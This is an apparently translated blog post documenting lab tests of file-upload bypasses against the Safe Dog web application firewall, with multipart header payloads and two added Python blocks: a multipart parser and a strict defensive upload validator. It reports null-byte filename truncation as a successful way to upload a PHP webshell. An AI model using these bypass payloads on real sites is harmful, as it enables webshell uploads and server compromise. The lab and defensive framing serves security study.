
File upload and Safe Dog

2022-06-26 04:41:00 Mountains and rivers "

Catalog

  • Environment setup
  • Analysis of the file upload request
  • WAF interception principle
  • Upload test
  • Character variation
      • Changing the Content-Disposition value
  • Reversed order
      • Swapping the order of name and filename
  • Duplicate data
      • Repeated boundary content
      • Repeated filename
  • Data overflow
      • Adding garbage data to the boundary string
      • Inserting garbage data at the end of the boundary
      • Inserting garbage data between name and filename
      • Inserting garbage data between multipart/form-data and boundary
  • Data truncation
      • CRLF truncation
      • Semicolon truncation
      • Quote truncation
      • Null-byte (00) truncation (success)


Environment setup

  1. Use phpStudy 2016, because the 2018 version does not generate the Apache service.
  2. Download Safe Dog (see the reference resources).

Note: download the Apache edition.

The vulnerability protection rules can be seen here:

Website protection > Vulnerability protection settings > Upload protection is where file uploads are protected.

Analysis of the file upload request

The front-end upload form must set enctype to multipart/form-data for files to upload normally.

A normal file upload request looks roughly like this:

POST /upload-lab/Pass-01/index.php HTTP/1.1
Host: 192.168.111.167
User-Agent: Mozilla/5.0 (Android 11; Mobile; rv:68.0) Gecko/68.0 Firefox/88.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Content-Type: multipart/form-data; boundary=---------------------------338226918236832126084030069411
Content-Length: 986
Origin: http://192.168.111.167
Connection: close
Referer: http://192.168.111.167/upload-lab/Pass-01/index.php
Cookie: PHPSESSID=37tvo07m8lu02b0qdvefjtbua7
Upgrade-Insecure-Requests: 1

-----------------------------338226918236832126084030069411
Content-Disposition: form-data; name="upload_file"; filename="php.png"
Content-Type: image/png

<?phpxx?>

-----------------------------338226918236832126084030069411
Content-Disposition: form-data; name="submit"

 Upload 
-----------------------------338226918236832126084030069411--

  • multipart/form-data: indicates that the request is a file upload request.
  • boundary string: acts as a separator that delimits the individual fields of the POST data.

Fields of the upload request that can be modified:

  • Content-Disposition: can generally be changed
  • name: the form parameter name; cannot be changed
  • filename: the file name; can be changed
  • Content-Type: the file's MIME type; change as appropriate
  • boundary: the part delimiter; can be changed
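To make that structure concrete, here is a small, deliberately lenient parser, added as an example (it is not code from the post, from Safe Dog or from any web server), that splits the request body shown above into parts using the boundary from the Content-Type header and extracts name and filename from each part's Content-Disposition header, roughly the way a web server or a file-name-based WAF does. The sample body is constructed from the packet above; Part, parse_multipart and uploaded_files are names chosen for this example.

```python
from __future__ import annotations

import re
from dataclasses import dataclass, field

# One Content-Disposition parameter: ';' key '=' (quoted-string | token).
PARAM_RE = re.compile(r';\s*([A-Za-z0-9_-]+)=(?:"([^"]*)"|([^;]*))')


@dataclass
class Part:
    """One field of a multipart/form-data body."""
    headers: dict = field(default_factory=dict)  # lower-cased header name -> value
    body: bytes = b""
    name: str | None = None
    filename: str | None = None


def parse_content_disposition(value: str) -> tuple[str, dict]:
    """Split 'form-data; name="f"; filename="x.png"' into the disposition and its parameters."""
    disposition, _, rest = value.partition(";")
    params = {}
    for m in PARAM_RE.finditer(";" + rest):
        params[m.group(1).lower()] = m.group(2) if m.group(2) is not None else m.group(3).strip()
    return disposition.strip(), params


def parse_multipart(content_type: str, body: bytes) -> list[Part]:
    """Split a multipart/form-data body into parts the lenient way a web server does."""
    m = re.search(r'boundary=("?)([^";]+)\1', content_type)
    if m is None:
        raise ValueError("Content-Type carries no boundary")
    # Delimiter lines in the body are "--" plus the boundary from the header.
    delimiter = b"--" + m.group(2).encode()
    parts = []
    # Everything before the first delimiter is preamble; each later segment is one
    # part, until the closing delimiter (boundary followed by "--") is reached.
    for segment in body.split(delimiter)[1:]:
        if segment.startswith(b"--"):
            break
        if segment.startswith(b"\r\n"):
            segment = segment[2:]
        if segment.endswith(b"\r\n"):
            segment = segment[:-2]
        head, _, data = segment.partition(b"\r\n\r\n")
        part = Part(body=data)
        for line in head.split(b"\r\n"):
            key, _, val = line.decode("latin-1").partition(":")
            part.headers[key.strip().lower()] = val.strip()
        cd = part.headers.get("content-disposition")
        if cd is not None:
            _, params = parse_content_disposition(cd)
            part.name = params.get("name")
            part.filename = params.get("filename")
        parts.append(part)
    return parts


def uploaded_files(content_type: str, body: bytes) -> list[tuple[str, str, bytes]]:
    """Return (field name, client file name, content) for every part that carries a filename."""
    return [(p.name, p.filename, p.body)
            for p in parse_multipart(content_type, body) if p.filename is not None]


# Constructed sample: the body of the request shown above, with its boundary.
BOUNDARY = "---------------------------338226918236832126084030069411"
CONTENT_TYPE = "multipart/form-data; boundary=" + BOUNDARY
SAMPLE_BODY = b"\r\n".join([
    b"--" + BOUNDARY.encode(),
    b'Content-Disposition: form-data; name="upload_file"; filename="php.png"',
    b"Content-Type: image/png",
    b"",
    b"<?phpxx?>",
    b"--" + BOUNDARY.encode(),
    b'Content-Disposition: form-data; name="submit"',
    b"",
    b"Upload",
    b"--" + BOUNDARY.encode() + b"--",
    b"",
])

if __name__ == "__main__":
    for name, filename, data in uploaded_files(CONTENT_TYPE, SAMPLE_BODY):
        print(f"field={name!r} filename={filename!r} size={len(data)} bytes")
```

Note that the header carries the bare boundary while every delimiter line in the body is "--" plus that boundary, which is why the dash counts differ between the two. The parser above accepts unquoted parameter values and parameters in any order, exactly like a forgiving server; the remainder of the post probes what happens when a WAF in front of such a server parses the same bytes less carefully than the server does.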

WAF interception principle

WAF detection is mainly based on the following:

  • File name: parse the file name and check whether it is on the blacklist.
  • File content: parse the file content and judge whether it is a webshell.
  • File and directory permissions: this requires a host-based WAF, such as Cloud Lock (云锁).

At present, most WAFs on the market parse the file name; a minority, such as Changting (Chaitin), parse the file content. Everything below concerns WAFs that work by file name parsing, such as Safe Dog.

The general steps are as follows:

  • Obtain the boundary value from the Content-Type value in the request header.
  • Using that boundary value, parse the POST data and extract the file name.
  • Check whether the file name is on the blocking blacklist.

Upload test

Taking the first level of upload-labs as an example for testing.

The Safe Dog detection rule is that as long as filename contains the keyword php the request is intercepted; whether the sensitive word is in the file name or in the suffix, the upload is blocked.

  1. Upload a file with a normal file name but with webshell content.

It is not intercepted, which shows that Safe Dog does not filter the file content.

The form-data word and the name field value may be quoted or unquoted without affecting the upload, but quotation marks must come in pairs, otherwise the upload fails.

However, changing or removing the quotation marks around filename is blocked.

# Normal field
Content-Disposition: form-data; name="upload_file"; filename="php.png"

# The form-data word and the name value may be quoted or unquoted without affecting the upload, but quotes must come in pairs or the upload fails
Content-Disposition: form-data; name=upload_file; filename="1.png"
Content-Disposition: form-data; name='upload_file'; filename="1.png"
Content-Disposition: 'form-data'; name=upload_file; filename="1.png"
Content-Disposition: "form-data"; name=upload_file; filename="1.png"

# However, changing or removing the quotes around the filename value is intercepted
Content-Disposition: form-data; name=upload_file; filename=2.png

As shown, a filename value without quotation marks is intercepted.

Character variation

Changing the Content-Disposition value

Some WAFs assume when parsing that the Content-Disposition value must be form-data, which leads to a bypass. In fact the Content-Disposition value can be changed arbitrarily or left empty.

Content-Disposition: form-d    ata; name="upload_file"; filename="1.png"
Content-Disposition: fora; name="upload_file"; filename="1.png"
Content-Disposition:name="upload_file"; filename="1.png"

Setting the Content-Disposition value to empty, as above, does not affect normal uploading.

Attempted bypass: failure.

Reversed order

Swapping the order of name and filename

Because it is stipulated that Content-Disposition must come first, only the order of name and filename can be swapped.

Some WAFs may match name first and filename afterwards, which can lead to a bypass.

Content-Disposition: form-data; filename="1.php"; name="upload_file"

Duplicate data

Repeated boundary content

As shown below, it appears that the first one, she.png, is the file uploaded (though not necessarily).

But as long as either of the two filename values contains the php keyword, it is detected. If the WAF took only one of the file names, it would be bypassed.

Repeated filename

Content-Disposition: form-data; name="upload_file"; filename="shell.jpg filename="shell.jpg"; filename="shell.jpg"; filename="shell.jpg"; filename="shell.jpg"; filename="shell.jpg"; filename="shell.php";

Data overflow

Adding garbage data to the boundary string

The boundary string can be any data (subject to a certain length limit). When its length exceeds what the WAF can handle while the web server can still handle it, the WAF can be bypassed to upload the file.

Except for the last boundary value, the other boundary values must be consistent, otherwise the upload fails. But if a comma is placed in a boundary value, arbitrary data can be inserted after it; these boundary values then no longer need to be consistent and the upload is unaffected.

WebKitFormBoundaryzEHC1GyG8wYOH1rffbf0fd31ead48dcc0b9f2312bf8658dafbf0fd31ead48dcc0b9f2312bf8658dafbf0fd31ead48dcc0b9f2312bf8658dafbf0fd31ead48dcc0b8dafbf0fd31ead48dcc0b9f2312bf8658dafbf0fd31ead48dcc0b9f2312bf8658dafbf0fd31ead48dcc0b9f2312bf8658dafbf0fd31ead48dcc0b9f2312bf8658dafbf0fd31ead48dcc0b9f2312bf8658dafbf0fd31ead48dcc0b9f2312bf8658dafbf0fd31ead48dcc0b9f2312bf8658dafbf0fd31ead48dcc0b9f2312bf8658dafbf0fd31ead48dcc0b9f2312bf8658dafbf0fd31ead48dcc0b9f2312bf8659f2312bf8658dafbf0fd31ead48dcc0b9f2312bf8658dafbf0fd31ead48dcc0b9f2312bf8658dafbf0fd31ead48dcc0bf8658dafbf0fd31ead48dcc0b9f2312bf8658dafbf0fd31ead48dcc0b9f2312bf8659f2312bf8658dafbf0fd31ead48dcc0b9f2312bfWebKitFormBoundaryzEHC1GyG8wYOH1rffbf0fd31ead48dcc0b9f2312bf8658dafbf0fd31ead48dcc0b9f2312bf8658dafbf0fd31ead48dcc0b9f2312bf8658dafbf0fd31ead48dcc0b8dafbf0fd31ead48dcc0b9f2312bf8658dafbf0fd31ead48dcc0b9f2312bf8658dafbf0fd31ead48dcc0b9

Except for the last boundary, the same garbage data was inserted into all the others, but no matter how much is added it is still blocked!!

Inserting garbage data at the end of the boundary

Since boundary can contain arbitrary data, a large amount of garbage data can be appended to the end of the boundary string. Here it is intercepted.

Inserting garbage data between name and filename

Insert a large amount of garbage data between name and filename.

fbf0fd31ead48dcc0b9f2312bf8658dafbf0fd31ead48dcc0b9f2312bf8658dafbf0fd31ead48dcc0b9f2312bf8658dafbf0fd31ead48dcc0b8dafbf0fd31ead48dcc0b9f2312bf8658dafbf0fd31ead48dcc0b9f2312bf8658dafbf0fd31ead48dcc0b9f2312bf8658dafbf0fd31ead48dcc0b9f2312bf8658dafbf0fd31ead48dcc0b9f2312bf

Adding more does not help.

Inserting garbage data between multipart/form-data and boundary

Cannot bypass.

Data truncation

CRLF truncation

The value of a POST request header (not the header line itself) can be continued on a new line, but there must be no blank line in between. If the WAF matches the file name only up to the newline, it can be bypassed.

Intercepted.

Semicolon truncation

If the WAF matches file names only up to a semicolon, it can be bypassed.

Content-Disposition: form-data; name="upload_file"; filename="2.png;.php"

Quote truncation

Single- and double-quote truncation is a feature of PHP < 5.3.

Content-Disposition: form-data; name="upload_file"; filename="shell.jpg'.php"
Content-Disposition: form-data; name="upload_file"; filename="shell.jpg".php"

Null-byte (00) truncation (success)

In a URL, %00 represents ASCII code 0, and ASCII 0 is reserved as a special character, so when %00 appears in a URL the read is considered finished. Here [0x00] stands for the hexadecimal 00 character.

Content-Disposition: form-data; name="upload_file"; filename="asd.php[0x00].jpg"

Upload the file, capture the request with Burp, and change the filename value to: asd.php;.jpg

Then open the hex view (a semicolon is 0x3b in hexadecimal), edit the hex content and change 3b to 00:

Successfully bypassed.
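Every technique in the sections above (WAF interception principle, character variation, duplicate data, data overflow and data truncation) relies on a WAF resolving an ambiguity differently from the server behind it. The server-side check below, added here as an example and not code from the post, from Safe Dog or from upload-labs, takes the defender's side of that lesson: it fails closed on any Content-Disposition it cannot parse unambiguously (control characters such as CR, LF and NUL, a disposition other than form-data, unbalanced quotes, junk between parameters, duplicate filename parameters), decides on an allowlisted extension plus the file content's magic bytes rather than a keyword blacklist, caps the boundary at the RFC 2046 limit of 70 characters, and stores the file under a random name. The names check_upload, strict_disposition_params, boundary_from and safe_storage_name, the allowlist and the DENIED_ANYWHERE list are assumptions made for this example; the sample header lines are taken from the post.

```python
import re
import secrets

# Allowlisted extensions and the magic bytes a file of that type must start with.
# An allowlist plus a content check replaces the keyword blacklist the post describes.
ALLOWED_TYPES = {
    "png": b"\x89PNG\r\n\x1a\n",
    "jpg": b"\xff\xd8\xff",
    "jpeg": b"\xff\xd8\xff",
    "gif": b"GIF8",
}
# Optional keyword rule mirroring the one the post attributes to Safe Dog (hypothetical list).
DENIED_ANYWHERE = ("php",)

# One parameter: ';' key '=' (quoted-string | token); used with re.match at a given offset.
PARAM_RE = re.compile(r'\s*;\s*([A-Za-z0-9_-]+)=(?:"([^"]*)"|([^;"\s]+))')
# Accepted file names: safe characters only, dot-separated, exactly one final extension.
FILENAME_RE = re.compile(r"^[A-Za-z0-9_-]+(?:\.[A-Za-z0-9_-]+)*\.([A-Za-z0-9]+)$")
# RFC 2046 boundary: 1 to 70 characters from the bchars set, not ending in a space.
BOUNDARY_RE = re.compile(r"^[A-Za-z0-9'()+_,\-./:=? ]{0,69}[A-Za-z0-9'()+_,\-./:=?]$")


class Rejected(Exception):
    """Carries the short reason for refusing a request."""


def strict_disposition_params(value: str) -> dict:
    """Parse a Content-Disposition value and refuse anything ambiguous.

    Rejects control characters (CR, LF, NUL), dispositions other than
    form-data, unbalanced quotes, junk between parameters and duplicate keys.
    """
    if re.search(r"[\x00-\x1f\x7f]", value):
        raise Rejected("control character in header value")
    disposition, sep, rest = value.partition(";")
    if disposition.strip() != "form-data":
        raise Rejected("disposition is not form-data")
    rest = (sep + rest).rstrip()
    params, pos = {}, 0
    while pos < len(rest):
        m = PARAM_RE.match(rest, pos)
        if m is None:
            raise Rejected(f"malformed parameter syntax at offset {pos}")
        key = m.group(1).lower()
        if key in params:
            raise Rejected(f"duplicate parameter {key!r}")
        params[key] = m.group(2) if m.group(2) is not None else m.group(3)
        pos = m.end()
    return params


def boundary_from(content_type: str):
    """Return the boundary if it meets the RFC 2046 charset and 70-character cap, else None."""
    m = re.search(r'boundary=("?)([^";]*)\1', content_type)
    if m is None or not BOUNDARY_RE.match(m.group(2)):
        return None
    return m.group(2)


def check_upload(cd_value: str, body: bytes) -> tuple:
    """Return (True, extension) if the part may be stored, otherwise (False, reason)."""
    try:
        params = strict_disposition_params(cd_value)
        filename = params.get("filename")
        if filename is None:
            raise Rejected("no filename parameter")
        m = FILENAME_RE.match(filename)
        if m is None:
            raise Rejected("filename contains unsafe characters")
        ext = m.group(1).lower()
        if ext not in ALLOWED_TYPES:
            raise Rejected(f"extension {ext!r} not in allowlist")
        if any(word in filename.lower() for word in DENIED_ANYWHERE):
            raise Rejected("filename contains a denied keyword")
        if not body.startswith(ALLOWED_TYPES[ext]):
            raise Rejected(f"content does not look like {ext}")
    except Rejected as exc:
        return False, str(exc)
    return True, ext


def safe_storage_name(ext: str) -> str:
    """Never reuse the client's name: a random name plus the validated extension."""
    return f"{secrets.token_hex(16)}.{ext}"


if __name__ == "__main__":
    # Constructed samples: a minimal PNG header, and header lines taken from the post.
    png = ALLOWED_TYPES["png"] + b"\x00" * 16
    samples = [
        ('form-data; name="upload_file"; filename="she.png"', png),
        ('form-data; name="upload_file"; filename="she.png"', b"<?phpxx?>"),
        ('form-data; filename="1.php"; name="upload_file"', png),
        ('form-data; name="upload_file"; filename="2.png;.php"', png),
        ('form-data; name="upload_file"; filename="asd.php\x00.jpg"', png),
        ('fora; name="upload_file"; filename="1.png"', png),
    ]
    for cd, data in samples:
        print(check_upload(cd, data), "<-", ascii(cd))
```

The design choice is to refuse rather than guess: optional quotes are tolerated because both server and check read them the same way, but reversed parameter order is harmless (the strict parser is order-independent and still sees 1.php), a repeated filename or the post's malformed repeated-filename line is rejected outright, and the semicolon, quote and null-byte variants never reach the extension check because the characters themselves are disallowed. An over-long or non-RFC boundary is refused by boundary_from before the body is parsed, which is the counterpart of the garbage-data sections, and storing under safe_storage_name means the client's file name never touches the filesystem at all.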

Copyright notice: this article was written by [Mountains and rivers "]; when reposting, please include the original link. Thank you.
https://yzsam.com/2022/177/202206260433543696.html